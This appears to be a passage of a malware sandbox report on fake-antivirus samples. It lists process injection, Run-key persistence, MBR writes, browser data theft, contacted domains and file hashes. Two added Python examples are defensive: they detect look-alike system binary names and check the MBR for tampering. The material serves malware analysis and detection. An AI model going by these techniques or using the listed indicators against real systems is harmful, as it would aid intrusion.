Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\svchost.exe N/A 2
N/A N/A N/A N/A 4
N/A N/A C:\Windows\system32\svchost.exe N/A 4
N/A N/A N/A N/A 2
N/A N/A C:\Windows\system32\svchost.exe N/A 52

Suspicious use of SendNotifyMessage

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\svchost.exe N/A 64

Suspicious use of UnmapMainImage

Description Indicator Process Target Count
N/A N/A N/A N/A 7

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe 5
PID 2124 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe \??\globalroot\systemroot\system32\usеrinit.exe 4
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe 5
PID 2520 wrote to memory of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe 1
PID 336 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE 2
PID 868 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE 3
PID 336 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe 2
PID 600 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe 3
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe 2
PID 2520 wrote to memory of 2668 N/A C:\Windows\system32\svchost.exe C:\Program Files\Internet Explorer\iexplore.exe 3
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe 2
PID 336 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe 1
PID 600 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe 3
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe 1
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE 4
PID 2668 wrote to memory of 2792 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE 4
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE 2
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe 1
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE 3
PID 336 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe 1
PID 600 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe 3
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe 9

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

\??\globalroot\systemroot\system32\usеrinit.exe

/install

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://secure.2010billing.com/purchase/get.php?i=antvir&advert=3&extern=4&lang=EN

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Network

Country Destination Domain Proto
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 8.8.8.8:53 www.yahoo.com udp
GB 87.248.114.11:80 www.yahoo.com tcp
NL 88.208.21.219:8083 tcp
US 8.8.8.8:53 secure.2010billing.com udp

Files

memory/2124-1-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/2124-2-0x0000000000630000-0x0000000000830000-memory.dmp

\Windows\System32\usеrinit.exe

MD5 4acd14244d2cd76d06939163127cfb10
SHA1 75f3e3c764f7d20c9950f5410f753f3210bcc2e7
SHA256 29b5b65a1cdf119ac7c6c9df76c6843b25a81bd00aa5a5e995ec675e34bf1acb
SHA512 001504da15c1825102479ba379b0be7ec15e779626d450d9d763552d7e1ac71f5bb86110f9361363bd401aabc53cdfd2d554480aec8bef85ed8c7b03cebf4031
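The dropped file above is not the Windows userinit.exe. The report renders its name with a non-ASCII letter in place of the second character (it appears to be Cyrillic small letter ie, U+0435; compare the ASCII userinit.exe in the Winlogon value of the PC Defender detonation), so it sits in System32 next to the genuine binary, carries a different hash, and passes a casual visual check. The Python below is an added example, not part of the report or of any vendor tooling: it folds file names to an ASCII skeleton (NFKC normalisation plus a small, assumed confusable map) and flags entries in a directory listing that fold to a protected system binary name or that mix scripts. The protected-name set, the confusable map and the sample listing are constructed for the example.

```python
import os
import sys
import unicodedata

# Partial confusable map (assumption for this example, not the full Unicode
# confusables table): Cyrillic/Greek letters that render like ASCII letters.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u03b1": "a", "\u03bf": "o", "\u03c1": "p", "\u03c5": "y",
}

# Binaries worth protecting by name; assumed short list for the example.
PROTECTED = {"userinit.exe", "winlogon.exe", "svchost.exe", "explorer.exe", "cmd.exe"}


def skeleton(name: str) -> str:
    """Fold a file name to ASCII: NFKC handles full-width forms, the map handles look-alikes."""
    folded = unicodedata.normalize("NFKC", name).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in folded)


def non_ascii_chars(name: str) -> list:
    """Every non-ASCII code point in the name, with its Unicode name, for the finding."""
    return [(ch, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN"))
            for ch in name if ord(ch) > 0x7F]


def letter_scripts(name: str) -> list:
    """Rough script set of the letters ('LATIN', 'CYRILLIC', ...) from the Unicode names."""
    return sorted({unicodedata.name(ch, "UNKNOWN").split(" ")[0]
                   for ch in name if ch.isalpha()})


def find_masquerades(listing, protected=PROTECTED) -> list:
    """Flag names that fold to a protected binary name, or that mix scripts."""
    protected_lower = {p.lower() for p in protected}
    findings = []
    for name in listing:
        if name.lower() in protected_lower:
            continue  # the genuine name; verify its hash/signature separately
        sk = skeleton(name)
        scripts = letter_scripts(name)
        if sk in protected_lower:
            reason = f"folds to {sk}"
        elif len(scripts) > 1:
            reason = "mixed scripts " + "/".join(scripts)
        else:
            continue
        findings.append({"name": name, "skeleton": sk, "reason": reason,
                         "non_ascii": non_ascii_chars(name)})
    return findings


if __name__ == "__main__":
    # Usage: python masq.py C:\Windows\System32   (defaults to the current directory)
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in find_masquerades(os.listdir(target)):
        print(f"{f['name']!r}: {f['reason']}; non-ASCII: {f['non_ascii']}")
```

Run it against System32 (and SysWOW64) on a suspect host; a hit on the skeleton check is the dropped binary itself, and a mixed-script hit with no skeleton match is still worth a hash lookup, since the confusable map is deliberately incomplete.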

\systemroot\system32\msiavjyv.dll

MD5 7943d251821ca441924f0d64946e8a3d
SHA1 cace099a490410260802ee143f7c7e3543f2f4cf
SHA256 be8dbcb59c3181ec518a6934931efc725a128310956fd076f0f0bd537b96a9eb
SHA512 0d4c9f021e07e2a27f3e7f46be591f01ec4c04fce98d9c177697ea4518d0c8d80105d73a29deff925cf28fce89a4fe40e790ef0086748dc169b1a8190e6d40f9

memory/2124-9-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/2520-14-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-20-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-15-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-25-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-30-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/272-32-0x0000000000F30000-0x0000000000F33000-memory.dmp

memory/272-37-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-41-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-33-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-42-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-55-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

memory/2520-63-0x00000000000A0000-0x00000000000BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{E9C1E0AC-C9B1-4c85-94DE-9C1518918D02}.tlb

MD5 63881935b6ff930a39df13a27c18c3f5
SHA1 d5464ca24d61b2efb562b1b4f4e0bef69c94cf04
SHA256 50d712b007a3339855619a4ad283661c07e13ec0a74465ea3d121439005cd1e5
SHA512 011d0307d088ac7a691ff504f8c3e99a06097fc27e10d40d62721cf6c6d0500120d040a7d32fd10aa50aeef1ef12be67501fff122bed129a354fb57c213a0ed9

C:\Windows\System32\exefile.exe

MD5 72178bb0f9674f0ce0b6b188d1219266
SHA1 ae3c43c7846c0ef977fa90991e1c366e34ab671c
SHA256 09cd3c864182b703a1384a15e60424c0ee8c82c3fd19f197c391a0e3ec5bd16e
SHA512 d9004c1b8402375c92690525f06ae83198bb929bb18dfc46fda9036a4054ed9c38637438b13ecc2566f98f2a8ac297ec7f0151b63a59c4f7bbc2ab8f7b6d779e

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx

MD5 aef9e26239afcb4b33a86a2fa1d7c6cd
SHA1 9d7d776bff2ad58b4d779abdb6e9e95762240db8
SHA256 2d17533cf49cc30e382b259be3cfd2ed2a65d7d8919705fcde6eda818cb7caf0
SHA512 52ab2b4a2eff04921b0c482e98c6d490bb9f112efbdf254b87f5740d93754225643b5feac4ab98a25517aac7502f3bb7a95b14be91f110cc0bf251bda6170ea5

memory/272-123-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-280-0x00000000000A0000-0x00000000000BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB696.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\CabB7B0.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarB7D5.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 33b3d0956cf1e67f6d99e50ff9ca4b72
SHA1 fc4acb2a82d5a3d3df7834de145748276305e2ae
SHA256 b3443acda6dc4679b02eb78011a6abdc9b430be0af87ee16dceeb3caf29f9791
SHA512 f201a105f5d2d4b3ba8c7d905fc290709d93fd2c8b1076fc5b66e803b89d4aa1e2ae64daba022f2473fc089e47d391edf7bdbaa43a36aae27d43345a0df0a619

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e8c8ad26e9f11b8928694bb2d6c6d94a
SHA1 32bfe7b01b90260cf7ac4e527544db21a18e2d77
SHA256 59df0721e4d7a01968a277611b7c87b9f90de375ed49e292b4f4e52d5a8b1c9a
SHA512 491d6c4bf7eccbe90222d167e8b381c7932f77ec4f66bccf41dc9a229bd8b356cd43e3ff848e3e9b86fc74d13f58d12f9346686474240ad7af6bff98aae376ee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 960fd6e3c4cdc6b807d17f5183771629
SHA1 0b9411a227592040fc7fab84ba09c0bef1af1b47
SHA256 77faa62106444cd9b4ab805fa8090ee361d96fe76ac37cdd6f82da2c089e83e5
SHA512 952ac212ac701a0bb560a4fff46874ed073ba1212883dab76f4cd2a753ddededda9b13c0f12420dfd42f9e24dc4cb9fea7232342506ca18f35afaa5d16afa1a0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 562bd3326b44ef8ff5b8a8dafdbcd71d
SHA1 dc5d49d3aa18f7f4b2455e8c66521a88dff16865
SHA256 6b61aafb816689db87e5623d5f125db9784b40cb65c3b390f99ab39562dd7cec
SHA512 cd766785b3d0d0a7d63de54a030b70a281d35a7e05c6cc65e766ddfe132c33020281ad8f745327fe14886be55317fe1cbe70270865890cb49b562be2adb60fa4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 525a799223225fc1377353ffa8d8bcd1
SHA1 0c0d1dafc844b63d820672f8967586d00a6159e6
SHA256 d8ab6a245af1599728c4c753bc8031e478dfce26e5f0c6738503e994d2243867
SHA512 ac63dcf10dfb07f9b54d92859d492db79d90096bb50791a6b5a37f1f7b83550e74c535920dd3270e19222f63b9784ce8c8b6dc4fb496214d1b532e618b352372

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c841051abe33a26f148bc8761b145c39
SHA1 1dbce39d749d88715f6acab03a5a83a9e211e9f4
SHA256 6e4e6863335ddcf5978e01482cd0798f325c43c2fa9cf09e5b6e2415004857da
SHA512 bdb62c311205ead009484111babaa0426b05daf4e09bbe5e33784dce95d9a4fea55e3eef17b8e6cee2b1ec713e83de92bd9f3ced1882693c7085a3b298d64089

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5356c799e535e8b9604d68074c5450da
SHA1 d49b6455fccdd16782da8c6bd100843e2b422032
SHA256 63f7c6561009827c552948ed158caa23ad70e3c4047f59b3575272638c97723b
SHA512 8132ec1b5adc24431f59d824768b8459fd3d507d4c8580b7c7935f5fe795ebec7d6065c809a3a3ef265314c917965b0a910bc0a7ae529a7d8f3421b53e1626db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 194a573050f71559bcd63ec8393f4032
SHA1 f63c29991b040840046ad7ac3e59620c10382fb0
SHA256 4c203b1bd151eb4a9ba6b74877f304fa5b2ba7a8d0b86bad8fb32cf950a22b08
SHA512 aa547eac5c2355f3a21872e1878aedd7418cb885d6c0cc94cc9e229a7ff5e6ac88dcaf914bd6ec508789f45329de00e595d2b296f59df78deaac164e5c445f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23a73bf5863c72733dd8cfe5708e6e27
SHA1 badff23e7692a5d227932d1923b76ea6614844f4
SHA256 41abd4255977c86e552cf7f66e100fe2c52c7694d5c69527090138f147d79fb0
SHA512 1c83768a68b6e09abccb639c1590273266f0af8d7db0cfcf5bd81c77673fd9ab62a02a58416d27fafb6a38e1fb5158722c696d0636a658608cc05a26d5a66013

Analysis: behavioral12

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Fake AV\\AntivirusPro2017.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
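Opening \??\PhysicalDrive0 for modification from a user-mode installer is what the bootkit tag refers to: sector 0 holds 440 bytes of bootstrap code, a 4-byte disk signature at offset 440, four 16-byte partition entries at offset 446 and the 0x55AA boot signature at offset 510. The Python below is an added example, not taken from the report: it parses a 512-byte sector, hashes only the bootstrap area so a replaced boot loader is detected even when the partition table is left intact (the usual bootkit pattern, since the OS must still boot), and diffs a fresh read of sector 0 against a trusted baseline. The sample sector is constructed inline; on a live host read the first 512 bytes of \\.\PhysicalDrive0 as Administrator.

```python
import hashlib
import struct

MBR_SIZE = 512
BOOTSTRAP_LEN = 440      # bootstrap code; the 4-byte disk signature follows at offset 440
PART_TABLE_OFF = 446     # four 16-byte partition entries
SIGNATURE_OFF = 510      # 0x55 0xAA
PART_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Decode a 512-byte MBR: boot signature, disk signature and the non-empty partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    parts = []
    for i in range(4):
        status, _chs_s, ptype, _chs_e, lba, count = struct.unpack_from(
            PART_FMT, sector, PART_TABLE_OFF + 16 * i)
        if ptype:  # type 0x00 marks an unused slot
            parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                          "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[SIGNATURE_OFF:] == b"\x55\xAA",
        "disk_signature": struct.unpack_from("<I", sector, BOOTSTRAP_LEN)[0],
        "partitions": parts,
    }


def bootstrap_hash(sector: bytes) -> str:
    """SHA-256 of the bootstrap code only, so partition-table edits do not mask a swapped loader."""
    return hashlib.sha256(sector[:BOOTSTRAP_LEN]).hexdigest()


def diff_mbr(baseline: bytes, current: bytes) -> list:
    """Compare a fresh read of sector 0 against a trusted baseline; returns findings (empty = clean)."""
    findings = []
    if bootstrap_hash(current) != bootstrap_hash(baseline):
        findings.append("bootstrap code changed")
    b, c = parse_mbr(baseline), parse_mbr(current)
    if not c["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if b["partitions"] != c["partitions"]:
        findings.append("partition table changed")
    return findings


def build_sample_mbr() -> bytes:
    """Constructed sample sector (not from the report): stub loader, one bootable NTFS partition."""
    boot_code = b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x00" * (BOOTSTRAP_LEN - 8)
    disk_sig = struct.pack("<I", 0x1234ABCD) + b"\x00\x00"
    entry = struct.pack(PART_FMT, 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800)
    table = entry + b"\x00" * 48
    sector = boot_code + disk_sig + table + b"\x55\xAA"
    assert len(sector) == MBR_SIZE
    return sector


if __name__ == "__main__":
    good = build_sample_mbr()
    # Live check (Windows, elevated):  current = open(r"\\.\PhysicalDrive0", "rb").read(512)
    tampered = bytearray(good)
    tampered[0:4] = b"\x90\x90\x90\x90"   # simulate a bootkit patching the loader in place
    print(parse_mbr(good))
    print(diff_mbr(good, bytes(tampered)))
```

Take the baseline from a clean image of the same disk (sector 0 is not part of any volume, so a file-system backup will not contain it) and store the bootstrap hash alongside the partition layout; a changed hash with an unchanged partition table is the signal to pull the disk for offline analysis.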

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 twinkcam.net udp
US 103.224.212.215:80 twinkcam.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 ww25.twinkcam.net udp
US 199.59.243.225:80 ww25.twinkcam.net tcp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 215.212.224.103.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3692-0-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-1-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-3-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

memory/3692-4-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-5-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-6-0x00000000028F0000-0x00000000028F1000-memory.dmp

memory/3692-7-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-8-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-9-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-10-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-11-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-12-0x00000000028F0000-0x00000000028F1000-memory.dmp

memory/3692-13-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-14-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-15-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-16-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-17-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-18-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-19-0x0000000000400000-0x0000000000A06000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:39

Platform

win10v2004-20240226-en

Max time kernel

113s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3880 --field-trial-handle=2228,i,521073434451423547,2311651514500527526,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f8 0x2ec

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp

Files

memory/492-1-0x0000000000BA0000-0x0000000000D92000-memory.dmp

memory/492-0-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/492-2-0x0000000005780000-0x000000000581C000-memory.dmp

memory/492-3-0x0000000005DD0000-0x0000000006374000-memory.dmp

memory/492-4-0x00000000058C0000-0x0000000005952000-memory.dmp

memory/492-5-0x0000000005760000-0x0000000005770000-memory.dmp

memory/492-6-0x0000000005830000-0x000000000583A000-memory.dmp

